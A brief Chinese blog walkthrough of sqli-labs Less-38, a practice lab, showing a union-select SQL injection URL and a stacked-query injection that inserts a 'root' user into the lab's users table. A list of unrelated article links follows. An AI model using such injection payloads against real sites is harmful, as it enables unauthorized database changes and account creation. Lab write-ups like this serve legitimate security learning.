这个直接用union select就可以

http://192.168.136.128/sqli-labs-master/Less-38/?id=0' union select 1,2,3%23

看一下源码,发现这关的关键并不在此

mysqli_multi_query()是可以执行多条语句的

来看这个语句

两条select都得到了执行

这个就涉及到了堆叠注入,参考 https://www.cnblogs.com/0nth3way/articles/7128189.html

http://192.168.136.128/sqli-labs-master/Less-38/?id=1';insert into users(id,username,password) values (15,'root','root')%23

insert执行成功

最新文章

  1. 利用session_set_save_handler()函数将session保存到MySQL数据库中
  2. MVC重写DefaultModelBinder实现自定义模型绑定
  3. Django~Databases
  4. sql server 2008 数据库的完整性约束
  5. Virtualbox虚拟机安装Ubuntu图文版
  6. PHP无限极分类生成树方法
  7. insertion sort
  8. 字体图标 icon font
  9. xcode升级插件失效修复
  10. 在linux下用tomcat部署java web项目的过程与注意事项(转)
  11. Json的反序列化 .net Newtonsoft.Json
  12. docker应用笔记
  13. CCNA笔记(2)
  14. C# 通用单例窗体类
  15. 有效使用django的queset
  16. docker registry v2与harbor的搭建
  17. [Node.js] 05 - Modules and Function
  18. 【java】之彻底明白进制转换
  19. 资源打包Assetbundle .
  20. Linux设备驱动剖析之SPI(四)

热门文章

  1. zookeeper概念与原理
  2. Android第三方开源下拉框:NiceSpinner
  3. shell EOF注意点
  4. Python图像处理库PIL中图像格式转换(一)
  5. 一个简单RPC框架是怎样炼成的(I)——开局篇
  6. python (001)----列表
  7. ZOJ 3814 Sawtooth Puzzle (2014年牡丹江赛区网络赛F题)
  8. Codeforces Round #306 (Div. 2) A
  9. 小白学开发(iOS)OC_ 字符串写入文件(2015-08-13)
  10. hihocoder 1680 hiho字符串2 dp求方案数+递归